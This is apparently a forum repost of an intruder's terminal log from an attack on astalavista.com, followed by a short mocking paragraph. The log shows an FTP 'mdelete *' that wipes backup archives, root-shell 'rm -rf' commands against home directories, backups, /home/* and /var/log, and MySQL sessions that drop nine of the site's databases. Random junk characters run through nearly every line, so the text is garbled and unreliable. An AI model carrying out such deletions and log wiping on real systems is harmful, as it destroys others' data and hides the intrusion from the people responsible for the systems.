-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar; Y- X: P2 u/ o- f: m- u9 ]+ q
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2$ ^& J; ?* q, E2 F
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
& ~! e" g6 M& N* K-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar" N. c+ S6 Y0 e/ x* k
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar4 w8 a! n9 [7 b
[snip]# Q) J3 C0 v! D7 E1 a( v
226 Transfer complete./ U$ p8 I- _( U2 C, O% H) I
ftp> mdelete *4 y( I$ m0 V/ g
ftp> ls -la/ e j+ x$ l; Z, G& c
227 Entering Passive Mode (212,254,194,163,2,193)" X* Z3 E! v a$ F& E0 J
150 Opening BINARY mode data connection for ‘file list’." k* \( R- T" k+ z' P+ n3 p
226 Transfer complete.2 L" c |, e9 {3 M9 r
ftp>3 W( ^2 n! L7 @' T a
' ?) E# n$ K/ v
sh-3.2# cd /home' y: Y% k3 X' I& R9 O3 y& v! y0 J
sh-3.2# ls -la$ d- B) o/ g; c, w# r
total 120
0 ^3 c5 z. ~4 v5 ~. r2 bdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
- g# {& o( J/ H1 Pdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! n% V7 `" L1 m# D- xdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin4 T7 W4 h- R9 s7 ^4 |3 b
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
2 d& E6 n/ {0 u1 l-rw——- 1 root root 8192 Jun 3 02:45 aquota.user# y" S x# {7 ?2 ]: M
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet6 a, \8 x( G6 ?
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
, J" \% J) X& ~! mdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
8 W* u/ {! O4 jdrwx–x–x 10 com com 4096 Apr 28 12:40 com
5 u" U( x' F* t) _* ?5 C+ U) mdrwxr-xr-x 2 root root 4096 May 17 2007 ftp9 U: a) e6 i0 Z5 ?
drwx—— 3 jon jon 4096 Sep 21 2007 jon9 _5 P$ e& x4 b6 j
drwx—— 2 root root 16384 Sep 11 2007 lost+found
- N# Z6 {$ ]# x0 f! Wdrwxr-xr-x 2 root root 4096 Sep 14 2007 my; p, s5 L# U f; J8 b' p" V+ r
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata2 h6 x3 u" z5 R1 U5 q [$ ]
drwx—— 2 jon jon 4096 Sep 15 2007 test
/ M: G1 H' ^/ ~drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp" n# j6 W% M; e. a2 N; y, S8 P9 |
* ~7 E! u4 M# s5 _) a: u$ I9 `6 [4 }/ dsh-3.2# rm -rf backup// I# W) w" W& b) N/ D, E X
sh-3.2# rm -rf backup.14161/4 q* v: V1 L& E7 e+ P1 P4 R5 Y
sh-3.2# rm -rf ftp/- G# m. Q6 v( N2 J X4 S
sh-3.2# rm -rf jon/8 H! ^4 V `9 d. c/ m$ R+ b) ~
sh-3.2# rm -rf my/
* D! _: i3 @2 i6 {& I- N& n/ Gsh-3.2# rm -rf mysqldata/& O5 \) P$ F+ U d! A5 q, H5 c
sh-3.2# rm -rf test/0 e% E, f1 I7 l: r$ b
sh-3.2# rm -rf tmp/
# J z" _6 [) xsh-3.2# cd ~2 a7 O% Z, G9 D! d5 `
sh-3.2# rm -rf *
1 ?2 J. S/ U( @) N0 Q8 rsh-3.2# rm -rf /var/log/8 n( [& B3 D/ T. z; f6 c( u) q7 @
rm: cannot remove directory `/var/log//proftpd’: Directory not empty
4 }2 B" X3 x% J* L' Q/ a7 Bsh-3.2# rm -rf /home/*; W" p' J% k$ Z" F2 G) F4 Z
sh-3.2# mysql0 t( ^9 M, n- I& A
Welcome to the MySQL monitor. Commands end with ; or \g.
# E- K( L' q) lYour MySQL connection id is 407156 d3 A3 S: t( A+ W0 Z! m
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
0 L8 H1 _. g* ?8 W2 D; T9 a2 @% D+ W
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.' T. B* _- l1 n2 d
' s- T, b- o I! B5 s
mysql> show databases;% l$ h* B7 C' g
+———————–+0 p9 M0 R9 E$ Y* w% H% C" M
| Database |
) r* \/ w4 \1 l% @& w$ V+———————–+) c& m4 N. [9 P8 |" U
| information_schema |
5 } X. W$ a5 _7 \5 k| astanet_ads |
- I: L. C0 K6 F% B4 a7 Y| astanet_mailing_lists |1 E# ?' [0 @+ K& Q$ v
| astanet_mediawiki |/ z% c! J2 Q d* {; n% i2 L9 Y
| astanet_membersystem |
# @! c, T1 |, j7 `- B/ Z| com_contrexx |
9 y2 v) @. r! I. M) t| com_contrexx2 |3 F" A. z" g3 \6 q' b
| com_contrexx2_live |4 {( L2 Y- w# S) E6 c
| da_roundcube |
5 ~( E0 j" z% M0 Q- g! `6 A2 p| dolphin |
1 m. o9 K$ C4 v9 h2 q" c! S9 t/ R| ideapool |
& @9 q. b% k: d1 m1 a4 d. E) n| mysql |$ ~! |0 F7 O0 M* R
| test |
, s/ v6 a+ Y. W+ ?/ u| yourmaster |
1 H. P8 E$ n5 L2 E9 G3 P1 P+———————–+
$ N& d6 r& O) @+ c9 L' z# y% V$ t14 rows in set (0.03 sec)" A* F/ j4 E. n/ v
* ]' P \* t n+ z, D1 d" hmysql> drop database astanet_membersystem;3 r9 c1 G: E' I s. l" P: S2 N
droQuery OK, 46 rows affected (0.81 sec)
8 a& B% S& T9 N
& Z8 @: n- l2 w8 O- Xmysql> drop database com_contrexx;$ h& c3 `6 Q) _0 z3 ]; n. n* Y
Query OK, 211 rows affected (2.72 sec)
8 p, J: k8 ]% n! L6 D$ d9 u9 W" Q+ @; V3 l1 v+ ` O; V
mysql> drop database com_contrexx2;7 q C: z _1 \. V
Query OK, 237 rows affected (2.23 sec)2 x9 H L* s- f: p1 j4 B5 U8 P4 s
- B( N- k) w0 g1 {9 U7 B4 g
mysql> drop database com_contrexx2_live;4 _/ _" \0 G% ?& l9 Z
Query OK, 227 rows affected (7.63 sec)
1 L7 Y! H: O' ^2 a( X- p: X6 V4 ^5 k7 ^2 e1 S& `8 t
mysql> drop database ideapool;5 ?% y: R" O1 i/ e, \
Query OK, 69 rows affected (0.19 sec)
6 U" H; d. {' H, Y/ t$ J2 g0 k
! q, C- c) v! s: Gmysql> drop database yourmaster;
, s) O2 _8 J3 @! D, p* E" cQuery OK, 158 rows affected (0.55 sec)/ k. k7 M/ d. Q
: G4 z- x1 p$ Y1 c9 Qmysql> drop database astanet_ads;
9 \7 T& z6 _4 C' v4 ?8 t$ ZQuery OK, 9 rows affected (0.11 sec)2 k/ N% o3 c% J) d3 j3 r) K
v/ |: r$ t- ?% A* W- I/ g4 |6 W
mysql> drop database astanet_mailing_lists;
: `2 W8 G$ \* ^8 F$ T, h8 |: uQuery OK, 24 rows affected (1.47 sec)7 Q+ d! u' H" M+ Z6 G
& D. j4 y! p7 K. Dmysql> drop database astanet_mediawiki;
' I I! L/ X* P5 [! `/ j/ gQuery OK, 31 rows affected (0.51 sec)
9 o3 v1 Q( C2 k" k" A" E
3 J4 K9 S4 W! R2 W/ \7 J. Qmysql> show databases;' P9 I8 i7 F P$ R) u. F D: |
+——————–++ Z. x, s* s& Q! B# _
| Database |' E8 s- c5 ~9 h& d7 ~- v5 Y
+——————–+& K0 J" p1 v$ I7 W- t0 m
| information_schema |
; d- [. s) @4 [* Y& x| da_roundcube |, _. D Y0 O, ~
| dolphin |; L: F4 D# W3 F) m8 L/ b
| mysql |
7 d' x9 [0 d& K" `( z| test |
) m G& ~: S# A0 o0 M+ ]' s+——————–+
4 H9 _/ i2 H! O V. K& A: X) A5 rows in set (0.00 sec). f) v/ q( W( k1 u2 }# ~& t/ Y# b
* n. \* S6 w& Y' S
What a journey! We’re not sure exactly why the “Terminator” had any influence on
. G% V9 H5 K8 S+ F {2 utheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the2 p+ Q7 ^. s8 M/ X1 m
wrong to say this pack of morons *wont be back*.
& ]# s" n9 B6 ^8 m* l, ? |
发表于 2012-11-6 21:07:34
收藏
支持
反对